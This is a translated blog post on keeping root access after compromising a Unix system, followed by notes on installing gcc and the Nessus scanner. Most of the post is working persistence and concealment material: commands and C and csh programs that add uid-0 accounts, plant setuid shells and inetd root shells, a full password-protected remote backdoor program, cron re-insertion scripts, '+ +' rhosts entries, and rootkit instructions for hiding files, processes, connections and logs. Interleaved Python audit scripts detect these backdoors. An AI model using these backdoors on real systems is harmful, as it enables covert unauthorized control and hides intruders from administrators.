
After a Unix System Has Been Compromised

Date: 2023-07-24 20:31:55

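Preface: What should you do once you have root on a system? My own view:
First leave a few backdoors, for the obvious purpose of making it easy to get back in later, and then hide yourself. After that, check whether gcc is present so that programs can be compiled; if it is not, install it. If the machine is fast it is well suited to scanning, so install nessus too. The idea sounds fine; how to carry it out is shown below:

Part 1: Backdoors and hiding yourself

1.0 Backdoors:

1.0.1 Adding a user to /etc/passwd and /etc/shadow: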

echo "hacker::0:0::/:/bin/sh">>/etc/passwd
echo "hacker::::::">>/etc/shadow
Doing this by hand is tedious; here is someone else's program for it:
<++> backdoor/backdoor1.c 
#include <stdio.h> 
main() 
{ 
FILE *fd; 
fd=fopen("/etc/passwd","a+"); 
fprintf(fd,"hax0r::0:0::/root:/bin/sh/n"); 
} 
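<-->
However, root will notice this easily, so here is an improvement:
Modify a seldom-used account such as games instead. First run cp /etc/passwd /etc/passwdold, then use vi to edit /etc/passwdold, setting the uid and gid of games to 0 and giving it a shell. The games line then reads: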
games::0:0::/:/bin/sh 
Second improvement: add the user in the middle of /etc/passwd. (This is taken from someone else; I have not tried it.)
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected] linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each /(or approximately that/).
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
This is still easy to discover. Add an ordinary user instead and use the methods below to get root privileges.
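The account changes in 1.0.1 all leave the same traces in the account files: a second uid-0 entry or an empty password field. The following audit is an added example, not code from the original page; the sample passwd and shadow text is constructed, and `audit_accounts` is a hypothetical helper name.

```python
def parse_colon_file(text):
    """Yield (line_number, fields) for every non-blank, non-comment line."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if line and not line.startswith("#"):
            yield lineno, line.split(":")


def audit_accounts(passwd_text, shadow_text=""):
    """Return (user, finding) tuples for passwd(5)/shadow(5) text."""
    shadow_hash = {f[0]: f[1] for _, f in parse_colon_file(shadow_text) if len(f) > 1}
    findings, seen = [], set()
    for lineno, f in parse_colon_file(passwd_text):
        user = f[0]
        if len(f) != 7:
            findings.append((user, f"line {lineno}: {len(f)} fields instead of 7"))
            continue
        if user in seen:
            findings.append((user, f"line {lineno}: duplicate account name"))
        seen.add(user)
        try:
            uid = int(f[2])  # int() also catches spellings such as "000"
        except ValueError:
            findings.append((user, f"line {lineno}: non-numeric uid {f[2]!r}"))
            continue
        # Every line is checked, so a uid-0 entry placed mid-file is still found.
        if uid == 0 and user != "root":
            findings.append((user, f"line {lineno}: uid 0 on a non-root account"))
        if f[1] == "":
            findings.append((user, f"line {lineno}: empty password field in passwd"))
        elif shadow_hash.get(user) == "":
            findings.append((user, f"line {lineno}: empty password hash in shadow"))
    return findings


# Constructed sample data (not from a real host), modelled on the entries in 1.0.1.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
games::0:0::/:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/sh
hacker::0:0::/:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$6$constructed$notarealhash:19000:0:99999:7:::
alice::19000:0:99999:7:::
hacker::::::
"""

if __name__ == "__main__":
    for user, finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{user}: {finding}")
```

On a live host, pass the contents of /etc/passwd and /etc/shadow instead of the samples; reading the latter requires root.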
 
1.0.2 setuid shell
Method:
cp /bin/sh /tmp/.sh
chmod u+s /tmp/.sh
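From then on, simply running /tmp/.sh gives root.
However, data in /tmp is easily cleaned out, so the file can be placed in another directory. Here is a program version: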
<++> backdoor/backdoor2.c 
#include <stdio.h> 
main() 
{ 
system("cp /bin/sh /tmp/fid"); 
system("chown root.root /tmp/fid"); 
system("chmod 4755 /tmp/fid"); 
} 
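<-->
1.0.3 Process backdoor
Open /etc/inetd.conf. Its format is shown below; I will not explain it in detail, so read the relevant documentation yourself.
service-name socket-type protocol wait/nowait user server-program-path server-name-and-arguments
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Find a line like this:
daytime stream tcp nowait root internal
Change this line to what you want:
daytime stream tcp nowait root /bin/sh sh -i
Restart inetd:
kill -9 /usr/sbin/inetd or /usr/etc/inetd
The known services can be found in /etc/services, whose format is as follows:
(1) (2)/(3) (4)
smtp 25/tcp mail
You can add a service of your own:
evil 22/tcp evil
Then add to /etc/inetd.conf:
evil stream tcp nowait root /bin/sh sh -i
Restart inetd:
kill -9 /usr/sbin/inetd or /usr/etc/inetd
If a shell is started this way, remote login becomes possible. See the excerpt below:
A better and stealthier approach is to fake a network service so that it provides a backdoor that is harder to notice, for example one with password protection. Being able to get remote access easily without connecting through telnetd would be ideal. The approach is to bind one's "own" daemon to a port; the program shows no prompt to incoming connections, but as soon as the correct password is typed in directly, access to the system is granted. Below is a demonstration program for this kind of backdoor. (Note: this program is not very complete.)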
<++> backdoor/remoteback.c 
/* Coders: 
Theft Help from: 
Sector9, Halogen Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen, 
Psionic, g0d, Psionic. 
Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH), 
Global Hell(gH), Team Sploit, Hong Kong Danger Duo, 
Tg0d, EHAP. 
Usage: 
Setup: 
# gcc -o backhore backhore.c # ./backdoor password & 
Run: 
Telnet to the host on port 4000. After connected you 
Will not be prompted for a password, this way it is less 
Obvious, just type the password and press enter, after this 
You will be prompted for a command, pick 1-8. Distributers: 
Ethical Mutiny Crew */ 
#include <stdio.h> 
#include <stdlib.h> 
#include <errno.h> 
#include <string.h> 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <sys/socket.h> 
#include <sys/wait.h> #define PORT 4000 
#define MAXDATASIZE 100 
#define BACKLOG 10 
#define SA struct sockaddr void handle(int); 
int 
main(int argc, char *argv[]) 
{ 
int sockfd, new_fd, sin_size, numbytes, cmd; 
char ask[10]="Command: "; 
char *bytes, *buf, pass[40]; 
struct sockaddr_in my_addr; struct sockaddr_in their_addr; 
printf("/n Backhore BETA by Theft/n"); 
printf(" 1: trojans rc.local/n"); 
printf(" 2: sends a systemwide message/n"); 
printf(" 3: binds a root shell on port 2000/n"); 
printf(" 4: creates suid sh in /tmp/n"); 
printf(" 5: creates mutiny account uid 0 no passwd/n"); 
printf(" 6: drops to suid shell/n"); 
printf(" 7: information on backhore/n"); 
printf(" 8: contact/n"); if (argc != 2) { 
fprintf(stderr,"Usage: %s password/n", argv[0]); 
exit(1); 
} strncpy(pass, argv[1], 40); 
printf("..using password: %s../n", pass); if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { 
perror("socket"); 
exit(1); 
} my_addr.sin_family = AF_INET; 
my_addr.sin_port = htons(PORT); 
my_addr.sin_addr.s_addr = INADDR_ANY; if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) { 
perror("bind"); 
exit(1); 
} if (listen(sockfd, BACKLOG) == -1) { 
perror("listen"); 
exit(1); 
} sin_size = sizeof(SA); 
while(1) { /* main accept() loop */ 
if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) { 
perror("accept"); 
continue; 
} 
if (!fork()) { 
dup2(new_fd, 0); 
dup2(new_fd, 1); 
dup2(new_fd, 2); 
fgets(buf, 40, stdin); 
if (!strcmp(buf, pass)) { 
printf("%s", ask); 
cmd = getchar(); 
handle(cmd); 
} 
close(new_fd); 
exit(0); 
} 
close(new_fd); 
while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */ 
} 
} void 
handle(int cmd) 
{ 
FILE *fd; switch(cmd) { 
case '1': 
printf("/nBackhore BETA by Theft/n"); 
printf("[email protected]/n"); 
printf("Trojaning rc.local/n"); 
fd = fopen("/etc/passwd", "a+"); 
fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh"); 
fclose(fd); 
printf("Trojan complete./n"); 
break; 
case '2': 
printf("/nBackhore BETA by Theft/n"); 
printf("[email protected]/n"); 
printf("Sending systemwide message../n"); 
system("wall Box owned via the Ethical Mutiny Crew"); 
printf("Message sent./n"); 
break; 
case '3': 
printf("/nBackhore BETA by Theft/n"); 
printf("[email protected]/n"); 
printf("/nAdding inetd backdoor... (-p)/n"); 
fd = fopen("/etc/services","a+"); 
fprintf(fd,"backdoor/t2000/tcp/tbackdoor/n"); 
fd = fopen("/etc/inetd.conf","a+"); 
fprintf(fd,"backdoor/tstream/ttcp/tnowait/troot/t/bin/sh -i/n"); 
execl("killall", "-HUP", "inetd", NULL); 
printf("/ndone./n"); 
printf("telnet to port 2000/n/n"); 
break; 
case '4': 
printf("/nBackhore BETA by Theft/n"); 
printf("[email protected]/n"); 
printf("/nAdding Suid Shell... (-s)/n"); 
system("cp /bin/sh /tmp/.sh"); 
system("chmod 4700 /tmp/.sh"); 
system("chown root:root /tmp/.sh"); 
printf("/nSuid shell added./n"); 
printf("execute /tmp/.sh/n/n"); 
break; 
case '5': 
printf("/nBackhore BETA by Theft/n"); 
printf("[email protected]/n"); 
printf("/nAdding root account... (-u)/n"); 
fd=fopen("/etc/passwd","a+"); 
fprintf(fd,"hax0r::0:0::/:/bin/bash/n"); 
printf("/ndone./n"); 
printf("uid 0 and gid 0 account added/n/n"); 
break; 
case '6': 
printf("/nBackhore BETA by Theft/n"); 
printf("[email protected]/n"); 
printf("Executing suid shell../n"); execl("/bin/sh"); 
break; 
case '7': 
printf("/nBackhore BETA by Theft/n"); 
printf("[email protected]/n"); 
printf("/nInfo... (-i)/n"); 
printf("/n3 - Adds entries to /etc/services & /etc/inetd.conf giving you/n"); 
printf("a root shell on port 2000. example: telnet <host> 2000/n/n"); 
printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever/n"); 
printf("executed gives you a root shell. example:/tmp/.sh/n/n"); 
printf("5 - Adds an account with uid and gid 0 to the passwd file./n"); 
printf("The login is 'mutiny' and there is no passwd."); 
break; 
case '8': 
printf("/nBackhore BETA by Theft/n"); 
printf("http://theft.bored.org/n"); 
printf("[email protected]/n/n"); 
break; 
default: 
printf("unknown command: %d/n", cmd); 
break; 
} 
} 
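<-->
1.0.4 crontab backdoor (excerpt)
The root user's crontab file is kept in /var/spool/crontab/root, in the following format:
(1) (2) (3) (4) (5) (6)
0 0 * * 3 /usr/bin/updatedb
1. minute (0-60)
2. hour (0-23)
3. day (1-31)
4. month (1-12)
5. day of week (1-7)
6. program to run
The entry above runs the program at 0:00 every Wednesday. To set up a backdoor in cron, it is enough to add the backdoor program to /var/spool/crontab/root. For example, the program can check every day whether the user account we added to /etc/passwd is still valid. A sample program follows: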
0 0 * * * /usr/bin/retract 
<++> backdoor/backdoor.sh 
#!/bin/csh set evilflag = (`grep eviluser /etc/passwd`) 
if($#evilflag == 0) then 
set linecount = `wc -l /etc/passwd` 
cd 
cp /etc/passwd ./temppass 
@ linecount[1] /= 2 
@ linecount[1] += 1 
split -$linecount[1] ./temppass 
echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa 
cat ./xab >> ./xaa 
mv ./xaa /etc/passwd 
chmod 644 /etc/passwd 
rm ./xa* ./temppass 
echo Done... 
else 
endif 
<-->
There are many other ways to use this backdoor, such as dropping a setuid shell or shellcode, and so on.
A way to create the setuid shell:
<++> backdoor/backdoor3.c
#include <stdio.h> 
#define pass "triad" 
#define BUFFERSIZE 6 int main(argc, argv) 
int argc; 
char *argv[];{ int i=0; 
if(argv[1]){ 
if(!(strcmp(pass,argv[1]))){ 
system("cp /bin/csh /bin/.swp121"); 
system("chmod 4755 /bin/.swp121"); 
system("chown root /bin/.swp121"); 
system("chmod 4755 /bin/.swp121"); 
} 
} printf("372f: Invalid control argument, unable to initialize. Retrying"); 
for(;i<10;i++){ 
fprintf(stderr,"."); 
sleep(1); 
} 
printf("/nAction aborted after 10 attempts./n"); 
return(0); 
} 
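<-->
1.0.5 rlogin backdoor
On Unix machines, services such as Rsh and Rlogin use a simple authentication method based on the host names in the rhosts file. A user can easily change the settings so that no password is needed to get in. An intruder only has to put "+ +" into the rhosts file of some user they can access to allow anyone, from anywhere, to enter that account without a password. Intruders are especially keen on this when home directories are exported over NFS. These accounts then become backdoors for the intruder to get in again. Many prefer Rsh because it usually lacks logging. Many administrators regularly check for "+ +", so intruders in practice more often set the host name and user name of another account on the network, which is harder to detect.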
# echo "+ + " > /usr/bin/.rhosts 
# cat /usr/bin/.rhosts 
+ + 
# rlogin -l root localhost 
This logs in to your machine through rlogin as root without entering a password.
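The inetd.conf entries of 1.0.3 and the .rhosts entries of 1.0.5 can both be found by parsing the files in the formats shown above. This audit is an added example, not code from the original page; the sample lines are constructed from the entries quoted in those sections, and the function names and the `expected` trust list are assumptions.

```python
SHELLS = {"sh", "ash", "bash", "csh", "dash", "ksh", "tcsh", "zsh"}


def service_ports(services_text):
    """Map service name -> 'port/proto' from /etc/services-style text."""
    ports = {}
    for raw in services_text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) >= 2:
            ports.setdefault(fields[0], fields[1])
    return ports


def audit_inetd(conf_text, services_text=""):
    """Return (line, service, port, reason) for entries that start a shell."""
    ports, findings = service_ports(services_text), []
    for lineno, raw in enumerate(conf_text.splitlines(), start=1):
        fields = raw.split()
        if raw.lstrip().startswith("#") or len(fields) < 6:
            continue
        service, user, server = fields[0], fields[4], fields[5]
        # Field 6 is the program; field 7 starts its argv, which matters when a
        # wrapper such as tcpd is the program and the real target is argv[0].
        candidates = [server] + fields[6:7]
        if any(c.rsplit("/", 1)[-1] in SHELLS for c in candidates):
            findings.append((lineno, service, ports.get(service, "?"),
                             f"{' '.join(fields[5:])} runs as {user}"))
    return findings


def audit_rhosts(text, expected=frozenset()):
    """Return (line, entry, reason) for wildcard or unlisted .rhosts entries."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split()
        if not fields or fields[0].startswith("#"):
            continue
        entry = (fields[0], fields[1] if len(fields) > 1 else "")
        if "+" in entry:  # a bare "+" as host or user field is the wildcard
            findings.append((lineno, entry, "wildcard: any host and/or any user"))
        elif entry not in expected:
            findings.append((lineno, entry, "not in the expected trust list"))
    return findings


# Constructed samples built from the lines quoted in 1.0.3 and 1.0.5.
SAMPLE_INETD = """\
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
daytime stream tcp nowait root /bin/sh sh -i
evil stream tcp nowait root /bin/sh sh -i
"""
SAMPLE_SERVICES = "smtp 25/tcp mail\ndaytime 13/tcp\nevil 22/tcp evil\n"
SAMPLE_RHOSTS = "+ +\ntrusted.example.org alice\nother.example.net bob\n"

if __name__ == "__main__":
    for finding in audit_inetd(SAMPLE_INETD, SAMPLE_SERVICES):
        print("inetd.conf", finding)
    for finding in audit_rhosts(SAMPLE_RHOSTS, {("trusted.example.org", "alice")}):
        print(".rhosts", finding)
```

The `expected` list covers the case the text mentions, where a specific host and user are entered instead of "+ +": anything not on the list is reported for review.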
1.0.6 rootkit
This is the most interesting part. Here are a few rootkits:
1.0.6.1 First, linuxrootkit5.0, which can be downloaded here: http://www.securityfocus.com/tools/1489
a. Files included:
Contains backdoored versions of chfn, chsh, crontab, du, find, ifconfig, inetd, killall, linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, syslogd, tcpd, top, sshd, and su. Also comes with bindshell, fix, linsniffer, thesniff, sniffchk, wted, and z2.
b. What the files do:
1 - Modified programs that hide the intruder:
ls, find, du – these programs will not count or display the intruder's files; the data file is ROOTKIT_FILES_FILE, which defaults to /dev/ptyr. NOTE: all files can be listed with ‘ls -/’ if SHOWFLAG is enabled. Will hide any files/directories with the names ptyr, hack.dir, and W4r3z.
ps, top, pidof – these programs will not display the intruders processes 
netstat -- will not display traffic from or to specified IP addresses, user-ids, or ports 
killall – will not kill the intruders hidden processes 
ifconfig – will not display the PROMISC flag when sniffer is running 
crontab – will hide the crackers entries- the hidden crontab entry is in the /dev/hda02 by default 
tcpd – will not log connections listed in the configuration file 
syslogd -- will not log connections listed in the configuration file 
2 - Trojaned programs with backdoors:
chfn – new full name enter password will drop rootshell 
chsh – new shell enter password will drop rootshell 
passwd – rootshell if is entered as current password 
login – will allow the cracker to log in under any username with the rootkit password (satori)—also if root is refused username (rewt) will work and will disable the history logging 
3 - Trojaned network daemons:
inetd – rootshell listening on port 5002. The rootkit password must be entered as the first line (satori)
rshd – the username is the rootkit password, a root shell is bound to the port [ rsh (hostname) –l (rootkit password) ] 
4 - Utilities:
FIX – replaces and fixes timestamp/checksum information on files 
linsniffer – a packet sniffer 
sniffchk – checks to make sure the sniffer alive 
wted – wtmp/utmp editor 
z2 – erases entries in the wtmp/utmp/lastlog entries for a username-will only null the entry 
bindshell – binds a rootshell to a port (31337) by default

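c. Usage:

c.1 ls, du and find are used to hide files. First create /dev/ptyr, then add the files to be hidden to it. For example, to hide the file hacktool, use:
echo hacktool >>/dev/ptyr

c.2 ps, top and pidof hide processes. Hiding processes requires first creating a /dev/ptyp file. linuxrootkit provides four ways of hiding processes:
0 0 hides all processes with uid 0
1 p0 hides all processes on tty p0
2 sniffer hides all processes named sniffer
3 hack hides all processes whose name contains the string "hack"

To hide all processes containing "hack", use:
echo 3 hack >> /dev/ptyp

c.3 netstat is used to hide connections; this is configured in /dev/ptyq. There are 6 ways of hiding connections:

0 500 hides all connections belonging to uid 500
1 128.31 hides all network connections from 128.31.X.X
2 128.31.9.2 hides all connections from 128.31.9.2
3 8000 hides all connections from port 8000
4 6667 hides all connections to port 6667
5 term/socket hides all unix sockets whose path contains term/socket

c.4 syslog is used to hide system log records; this is configured in /dev/ptys

linuxrootkit's defaults can be configured in rootkit.h. The key setting is the password, which defaults to satori if not changed.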
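The control files described in section c are ordinary files placed in /dev, a directory that normally holds device nodes, and their contents say what was being hidden. The following check is an added example, not code from the original page or from the rootkit; it lists the directory through system calls rather than through the replaced ls, and the skipped subdirectories and function names are assumptions.

```python
import os
import stat

# Meaning of the first column, as listed for linuxrootkit in section c above.
PTYP_TYPES = {"0": "processes with uid", "1": "processes on tty",
              "2": "processes named", "3": "processes whose name contains"}
PTYQ_TYPES = {"0": "connections of uid", "1": "connections from network",
              "2": "connections from address", "3": "connections from port",
              "4": "connections to port", "5": "unix sockets with path containing"}
# Assumption: these /dev subdirectories legitimately hold regular files.
SKIP_DIRS = {"shm", "mqueue", "hugepages"}


def regular_files_in_dev(root="/dev"):
    """Return regular files under root; device directories normally have none."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath == root:
            dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue
            if stat.S_ISREG(mode):
                hits.append(path)
    return sorted(hits)


def decode_control(kind, text):
    """Describe what a recovered control file (ptyr, ptyp or ptyq) conceals."""
    table = {"ptyp": PTYP_TYPES, "ptyq": PTYQ_TYPES}.get(kind)
    out = []
    for line in text.splitlines():
        fields = line.split(None, 1)
        if not fields:
            continue  # blank line
        if table is None:  # ptyr: one hidden file or directory name per line
            out.append(f"hides file name {fields[0]!r}")
        elif len(fields) == 2 and fields[0] in table:
            out.append(f"hides {table[fields[0]]} {fields[1].strip()!r}")
        else:
            out.append(f"unrecognised entry {line!r}")
    return out


if __name__ == "__main__":
    for path in regular_files_in_dev():
        print("regular file in /dev:", path)
```

The decoder follows the linuxrootkit tables only; the SunOS kit's /dev/ptyq example later on this page numbers its entry types differently.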

1.0.6.2 Next is rootkitsunos. Description of its functions:

------------------
rootkit release 1.
------------------

After spending tons of time having to do all of this by myself,
I finally decided to write a simple makefile to do it for me.
Call me a script cracker, but I'm lazy as hell. You don't want
to use it, you don't have to. Keep in mind it takes me a max
of 40 seconds on a 4/65 to compile and install every program
here. Can you beat that by hand? :-)

Here is how it works:
execute the command: ` make all install '
The following programs will be installed suid root in DESTDIR:
z2: removes entries from utmp, wtmp, and lastlog.
es: rokstar's ethernet sniffer for sun4 based kernels.
fix: try to fake checksums, install with same dates/perms/u/g.

note: if you do not want these files installed suid (the administrator
has a cron to check for suid files, or the like), then type
make cleansuid and the suid bits will be removed.

The following programs will be patched and an attempt at spoofing
the checksums of the files will be made. Also, these files will
be installed with the same dates, permissions, owners, and groups
of the originals.

sl: become root via a magic password sent to login.
ic: modified ifconfig to remove PROMISC flag from output.
ps:
ns:
ls:
du5:
ls5:

Here are some notes on the patch for `ps`:
1.
This doesn't modify the process lists, so your
processes are STILL in memory, but ps just won't
administrator has another copy of ps sitting on
Best to search for SGID kmem programs to be fairly sure.
2.
An example /dev/ptyp file is as follows:
0 0 Strips all processes running under root
1 p0 Strips tty p0
2 sniffer Strips all programs with the name sniffer
3.
Do not leave a NULL string anywhere in the file. During
testing, I often pressed return after my last control
statement. Do not do this as it will cause a memory fault.
Do not use a character as the first line in the control file.
Remember to convert the UID's you wished masked to their
numerical format.
4.
Programs such as "top" will still show processes running.
This is bad. I'm working on a patch.

Here are some notes on the patch for `netstat`:
1.
This doesn't modify network listings, so your network
connections are STILL in memory, but `netstat` just
won't display them. If another copy of `netstat` is
run on the machine, it will produce accurate results.
Best to search for SGID kmem programs to be fairly sure.
2.
An example /dev/ptyq file is as follows:
0 6667 # Strip all foreign irc network connections
1 23 # Strip all local telnet connections
2 .209.5 # Strip all foreign connections from cert.org
3 .175.9.8 # Strip all local connections to netsys4.netsys.com
3.
Do not leave a NULL string anywhere in the file. It
will cause a memory fault. When stripping addresses,
a string search is used to compare addresses in the
control file with actual network connections. This
could cause minor problems.
4.
It would probably be better to only strip the address ONCE
for each line in the control file. Adding such commands
is trivial. Check `inet.c` for modifications.

Here are some notes on the patch for `ls` && `du` && `du5` && `ls5`:
1.
ls and du are trojaned and your files will
not be listed unless you issue a / flag.
2.
Example /dev/ptyr
sunsnif # Strip the filename sunsnif
icmpfake # Strip the filename icmpfake
3.
Would be useful if stripping uids, and gids was
included.
----
later eleetz, have fun and don't fuq shit up, all it duz
iz get people put in jail. werd.
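The README's remark about an administrator's cron job that checks for suid files, and the setuid shell copies of sections 1.0.2 and 1.0.4, both point at the same check: inventory set-id files and compare their content with the system shells, so a copy is recognised whatever it is named. This is an added example, not code from the original page; the scan roots and shell list are assumptions, and `find_setid_files` is a hypothetical helper name.

```python
import hashlib
import os
import stat


def sha256_file(path):
    """Return the SHA-256 hex digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_setid_files(roots, shell_paths, owner_uid=0):
    """List set-id files under roots as (path, mode, matching_shell_or_None)."""
    known = {}
    for shell in shell_paths:
        try:
            known[sha256_file(shell)] = shell
        except OSError:
            continue  # shell not present on this host
    hits = []
    for root in roots:
        for dirpath, _dirs, names in os.walk(root):
            for name in names:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                    if not stat.S_ISREG(st.st_mode):
                        continue
                    if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                        continue
                    if owner_uid is not None and st.st_uid != owner_uid:
                        continue
                    match = known.get(sha256_file(path))
                except OSError:
                    continue  # vanished or unreadable; rerun as root
                hits.append((path, oct(st.st_mode & 0o7777), match))
    return sorted(hits, key=lambda h: h[0])


if __name__ == "__main__":
    # Assumed scan roots and shell list; adjust for the host being checked.
    shells = ["/bin/sh", "/bin/csh", "/bin/bash"]
    for path, mode, match in find_setid_files(["/tmp", "/bin", "/usr/bin"], shells):
        note = f"identical to {match}" if match else "compare with baseline"
        print(f"{mode} {path}: {note}")
```

Entries reported with a matching shell are the high-confidence findings; the rest form the set-id inventory to compare against a known-good baseline.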

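Part 2: Installing gcc

GCC is the GNU project's free C compiler, and many Linux distributions install it by default. The source code of most popular free software compiles and runs under GCC.
Although GCC is available for many platforms (operating systems), commercial UNIX systems generally do not come with it installed. To use GCC on those operating systems you have to install it yourself.
The following describes how to obtain, install and set up GCC on the SUN Solaris operating system.

1 Obtain the GCC package that matches your operating system and its version
To use GCC on Solaris 2.5.1, get the matching GCC:
ftp://ftp.cdit.edu.cn/pub/unix/solaris/sparc25/gcc-2.7.2.1.gz

2 Decompress
The .gz suffix means the file has been compressed with GZIP. It must first be decompressed with gzip/gunzip.
$ gunzip gcc-2.7.2.1.gz

3 Install
The decompressed file is the installation package. Solaris has its own set of commands and programs for installing packages:
# pkgadd -d ./gcc-2.7.2.1
The installation that follows is interactive.

4 Setup
Taking gcc-2.7.2.1 as the example, GCC installs by default into /opt/GCC2721. This path may not be covered by the user's PATH variable, so PATH needs to be updated to make GCC convenient to use.

For csh users:
% setenv PATH ${PATH}:/opt/GCC2721/bin
For sh users:
$ PATH=$PATH:/opt/GCC2721/bin
$ export PATH

If you do not want to update the PATH environment variable every time you use GCC, put the lines above in the user's startup file:
For csh users: in the .cshrc file in the user's home directory
For sh users: in the .profile file in the user's home directory

5 Common problems
Q: When decompressing the gcc-version.gz file, the message "gunzip not found" appears.
A: You may not have installed gzip/gunzip beforehand. Download gzip for the relevant OS first, then install it.
It is also possible that gzip/gunzip is not in the PATH search path. Look in /usr/local/bin; if it is there, use the absolute path when running gunzip.

Q: gcc installed successfully, but compiling software fails with "can't find gcc".
A: The most likely cause is that gcc's executable directory is not in the user's current search path PATH. Follow the method described in step 4 of this article.

Q: How do I install and use a C++ compiler? [added:1999/10/24]
A: gcc provides g++ as its C++ counterpart. The g++ libraries are generally needed as well, so download the libstdc++ package for your OS version and install it.
After installation, set the LD_LIBRARY_PATH environment variable so that other programs can use the libstdc++ library:
$ LD_LIBRARY_PATH=/usr/local/lib
$ export LD_LIBRARY_PATH

6 Resources
ftp://ftp.cdit.edu.cn/pub/unix/solaris/ provides the gcc and gzip mentioned in this article
http://www.gnu.org the GNU project's website
http://metalab.unc.edu/ University of North Carolina site; provides installation packages of GCC and other GNU software for Solaris 2.x and 7, as well as a lot of source code and Linux software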

 

Part 3: Installing nessus and scanning

3.1 Download and installation

The easy and dangerous way (ala ximian gnome :))

If you are installing Nessus from a computer directly connected to the internet that has lynx installed, type this command (NOT as root! ) :

lynx -source http://install.nessus.org | sh

This method is considered as dangerous in the sense that if you do it, you are running commands that directly come from the internet. If someone is poisoning your domain name server, he may have you execute arbitrary commands as the user you will type this command as. The good point is that it completely automates the installation of Nessus, so if you are not under attack, you'll save some time.

the usual and boring way :

You can also install the Nessus tar archives individually.
To install Nessus, you have to download and compile these packages in the following order:

nessus-libraries
libnasl
nessus-core
nessus-plugins
See the compilation instructions if you have never compiled any tarballs before

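The first method is generally used because it is easier. It is somewhat less secure, though: if you install as an ordinary user you still have to enter the root password, and even when installing as root your password may be sniffed.

3.2 Creating a nessusd account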

# nessus-adduser
Addition of a new nessusd user
------------------------------

Login : renaud
Authentication (pass/cert) [pass] : pass
Password : secret

User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that renaud2 has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser(8) man page for the rules syntax

Enter the rules for this user, and hit ctrl-D once you are done : 
(the user can have an empty rules set)
deny 10.163.156.1
allow 10.163.156.0/24
default deny

Login            : renaud
Password         : secret
DN   :
Rules            :
deny 10.163.156.1
allow 10.163.156.0/24
default deny

Is that ok (y/n) ? [y] y
user added.

3.3 Starting the service

# nessusd -D

3.4 Connecting to nessusd

# nessus
This opens a window; just follow the prompts.


From: https://blog.51cto.com/u_1790502/6838901
